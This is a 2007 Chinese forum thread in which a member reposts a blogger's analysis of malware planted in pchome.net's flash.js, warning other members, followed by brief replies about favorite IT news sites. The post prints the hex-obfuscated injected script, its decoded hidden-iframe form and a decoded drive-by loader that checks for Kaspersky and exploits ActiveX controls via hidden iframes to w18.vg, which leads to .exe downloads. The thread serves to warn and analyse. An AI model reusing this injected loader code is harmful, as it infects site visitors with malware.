下沙论坛
标题:
小心!Pchome.net出现大面积挂马现象,敬请会员们注意安全!
[打印本页]
作者:
竹木刀
时间:
2007-12-29 15:56
标题:
小心!Pchome.net出现大面积挂马现象,敬请会员们注意安全!
截至2007-12-28 18:17 仍
未
修复
0 A' ]+ s! L5 b
8 ^0 B1 G; [, l
. h' _) V( v+ S) ?5 j1 I( ?- a) l! j& V
##
I#KE+X#D=$I#KE+XDI=KE+=X++D$IK#E#X+DI$KE+X=D=IK$E+$X=$D#I+$KEX$#DI+K#EXD=IKE+X#D#=I==K+E==XD+I#K$E$#X$D##I
/ \. y. z* ]) Q* B$ F6 ?' H
# K" e; r. M5 F; N* W+ C+ K+ D( \
从论坛看到的消息说pchome的某页面被挂马了,于是上去找,
http://article.pchome.net/content-502393-7.html#topView
4 ^6 I, D) |9 \ q, c/ Y+ n
; M# |0 s4 A0 @$ q3 _
挂得比较隐蔽,
http://btn.pchome.net/flash.js
的中间被加入了如下代码:
5 X, a1 @- v5 P; B% P( p/ S" \
8 b% P! X& b7 C( f
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]('\x3c\x69\x66\x72\x61\x6d\x65 \x68\x65\x69\x67\x68\x74\x3d\x30 \x77\x69\x64\x74\x68\x3d\x30 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x35\x39\x2e\x76\x63\x2f\x70\x61\x67\x65\x2f\x61\x64\x64\x5f\x36\x34\x34\x34\x35\x35\x2e\x68\x74\x6d\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');
* e; j4 `6 f* B: @$ P* E
: W; X9 k! t' O
也就是这个了:
& G4 x9 F' P- J6 t
8 k$ e, m S. o* E; i
window["document"]["writeln"]('<iframe height=0 width=0 src="http://www.59.vc/page/add_644455.htm"></iframe>');
" d+ N2 l9 g, R6 h( z/ y
% H# S% o$ h& ?) `
但只有这个js还不会使得那个iframe生效,使得他生效的是调用这个js显示flash 的代码:
& @9 F( v/ F* D
& Y* f$ f& g; ^( j, @$ |
<script language="javascript" type="text/javascript">
9 E3 a& y3 R' t8 t+ \) n2 \. R; t
writeflashhtml("_swf=http://btn.pchome.net/pchome/20071217/300_250.swf", "_width=300", "_height=250" ,"_wmode=opaque");
1 v* o4 p3 E' @6 q; L
</script>
) ~8 Q7 _' Z# B0 i9 _
+ D) R: {: G6 n
有了这个,iframe就生效了;经过一番调用和解密后得:
2 b% C! s7 [: r, u f) p& w! e( @
! ~1 {* Y, [) Q0 d0 H- x& P3 v
function bIsKIS(){for(i=2;i<26;i++){var kis6=new Image();var kis7=new Image();var root=String.fromCharCode(65+i);kis6.src="mk
MSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\Doc\\context.chm::/images/help.gif";kis7.src="mk
MSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\Doc\\context.chm::/images/help.gif";if(kis6.height==41||kis7.height==41)return true}return false}var Then=new Date();aaxxx="xxxyyyyfassssfsadfasdf";Then.setTime(Then.getTime()+24*60*60*1000);var aaffdasfascookie=new String(document.cookie);var cookieHeader="Cookie1=";aaxxx="xxxyyyyfassssfsadfasdf";if(!bIsKIS()&&aaffdasfascookie.indexOf(cookieHeader)==-1){aaxxx="xxxyyyyfassssfsadfasdf";document.cookie="Cookie1=POPWINDOS;expires="+Then.toGMTString();aaxxx="xxxyyyyfassssfsadfasdf";try{if(new ActiveXObject("IERPCtl.IERPCtl.1"))document.write('<iframe style=display:none src="
http://w18.vg/real.gif
"></iframe>')}catch(e){}try{if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)document.write('<iframe style=display:none src="
http://w18.vg/ms.gif
"></iframe>')}catch(e){}try{if(new ActiveXObject("DPClient.Vod"))document.write('<iframe style=display:none src="
http://w18.vg/xl.gif
"></iframe>')}catch(e){}try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))document.write('<iframe style=display:none src="
http://w18.vg/lz.gif
"></iframe>')}catch(e){}try{if(new ActiveXObject("MPS.StormPlayer.1"))document.write('<iframe style=display:none src="
http://w18.vg/bf.gif
"></iframe>')}catch(e){}try{if(new ActiveXObject("BaiduBar.Tool.1"))document.write('<iframe style=display:none src="
http://w18.vg/baidu.gif
"></iframe>')}catch(e){}}
! R% D( Y' K- W6 [8 A# m
7 z; f' H {( I
K##E+XD++IK+EX=#D$IKEXD+$I#KEXDI+K$EX$DI$$KE##X#DI=K+E$X=$DI#K+#EX=DIK=E$=XDIK=$EX=DIK$E$#X=D=I##KE#=X+$D+
! r# f( n+ S5 w' m. n) [8 l4 K
" b$ v) o" n+ E- J
. m/ s3 {8 D* q G
挑了几个解密得:
http://w18.vg/s.exe
* t! m! I9 [* H/ p* ^2 \) i
3 P- ?" q" R+ ^: M" W
从这个文件里面得到另外一个链接:
http://w18.vg/ss.exe
+ _# @( |" ?* s0 j4 Q7 a7 t, M
+ k2 S" V2 i% c* k0 `& Z$ F8 q5 m7 X
有点面熟的东西……
& p- S2 D% T" q2 b
. G4 M6 C' c; }4 B, K
##
K=E#X+D=IKE$XD$=I==K+#EXD=#I=KE$+XDI#K$=EX=D=#IK+E=X$D==I=#K=E##X$D$+IK=#EXD+IK$EX$=D+I+K#E$XD+IKEX#D
* y% S" J6 Q) @7 w
& K2 o2 W6 ~% \- Q. e6 l
从上面可以知道,出问题的是那个flash.js,因此所有使用这个js来放flash的页面全都有毒了!我随便找了几个页面,发现都是有毒的,这回可是大面积的被挂咯,同志们自己小心了。
0 c$ o7 t( B- R4 D6 {5 [
; q- e! {8 T: i3 R9 ?9 P
K$EX=+DI#$KE+X#DIK$EXD$I=KE$XD+#I+KEXD=I+KE=X$D=I=KEXD#=IK==E$X=D=I#+KEXD=IK#EX#DI=K=E=X=#DIKEXDI#KE
# C* U. G/ L/ t7 f7 Q0 b$ d
3 E: S+ g2 }' T* x7 ]0 L. R
转载请保留声明!(
http://hi.baidu.com/dikex/blog/item/36300afa339a8c889e5146f5.html
)
- t* Q* ~3 K2 S2 ?1 S7 z
& L4 _* |$ A& I
! T( X5 ]$ p5 o3 b6 _
作者dikex(六翼刺猬),原文链接:
http://hi.baidu.com/dikex/blog/item/92f804c70762ead8d10060ff.html
作者:
煎饼
时间:
2007-12-29 21:36
多谢。it类一般只去pconline和zol
作者:
竹木刀
时间:
2007-12-29 21:57
我是四处流窜的,IT信息看CB比较多。
作者:
煎饼
时间:
2007-12-30 01:41
对了。忘记说cnbeta最常去了
欢迎光临 下沙论坛 (http://bbs.xiasha.cn/)
Powered by Discuz! X3.3